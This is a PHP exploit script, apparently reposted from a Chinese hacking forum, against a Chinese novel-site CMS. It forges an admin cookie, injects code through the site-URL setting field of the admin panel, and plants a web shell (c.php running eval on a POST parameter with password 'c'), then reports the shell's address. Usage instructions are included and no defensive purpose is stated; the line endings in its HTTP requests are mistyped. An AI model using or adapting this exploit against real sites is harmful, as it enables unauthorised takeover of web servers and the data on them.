转至黑防 <?php ini_set("max_execution_time",0); function post($v_hosts,$v_paths,$v_p) { $host = $v_hosts; $path = $v_paths; $pa = $v_p; $data="sitename=&siteurl=%24%7B%24%7Bfputs%28fopen%28base64_decode%28Yy5waHA%29%2Cw%29%2Cbase64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5odWFu%29%29%7D%7D&email=&keywords=&flush=6&html=1&reurl=1&link=&tongji=&cmdSave=%C8%B7%C8%CF%D0%DE%B8%C4"; $packet ="POST ".$path.$pa."/admin_man.php?id=save HTTP/1.1/r/n"; $packet.="Content-Type: application/x-www-form-urlencoded/r/n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)/r/n"; $packet.="Host: 127.0.0.1/r/n"; $packet.="Content-Length: ".strlen($data)."/r/n"; $packet.="Connection: Keep-Alive/r/n"; $packet.="Cookie: x_Cookie=admin;/r/n/r/n"; $packet.=$data; $o = @fsockopen($host,80); if(!$o){ echo "/n[x] 没有返回,网站有可能访问不了!"; die; } fputs($o,$packet); $i="[x]等待中."; echo $i; $b="."; while (!feof($o)){ $data.=fread($o,1024); $b.="."; echo $b; } fclose($o); $ok=strstr( $data,"alert"); if( empty($ok)){ echo "/n[x] 未成功,至于原因嘛,自己找吧!"; die; }else{ echo "/n[O]写入配置成功!/r/n"; } } function got($g_hosts,$g_paths) { $host1 = $g_hosts; $path1 = $g_paths; $packet1="GET ".$path1."/config.php HTTP/1.1/r/n"; $packet1.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)/r/n"; $packet1.="Host: 127.0.0.1/r/n"; $packet1.="Connection: Keep-Alive/r/n/r/n"; $fg = @fsockopen($host1,80); fputs($fg,$packet1); $packet2="GET ".$path1."/c.php HTTP/1.1/r/n"; $packet2.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)/r/n"; $packet2.="Host: 127.0.0.1/r/n"; $packet2.="Connection: Keep-Alive/r/n/r/n"; fputs($fg,$packet2); $i="[x]写入shell中."; echo $i; $b="."; while(!feof($fg)){ $data1.=fread($fg,1024); $b.="."; echo $b; } $ok1 = strstr( $data1,"huan"); if (empty($ok1)){ echo "/n[x] 没有写入?自己查找原因。"; die; }else{ echo "/n[O]试试webshell吧 /r/n[O]地址是http://".$host1."/c.php 密码是 c 。"; } fclose($fg); } $hosts = $argv[1]; $paths = $argv[2]; $p = $argv[3]; if(empty($hosts) or empty($paths) or empty($p)){ print_r(' [x] 冷迪小说系统漏洞利用工具 [x] CODE BY 幻泉(bl4ck) [-] 用法: php exp.php 网站地址 网站路径 后台路径 [-] php exp.php localhost /ldbook/ admin '); die; } post($hosts,$paths,$p); got($hosts,$paths); ?>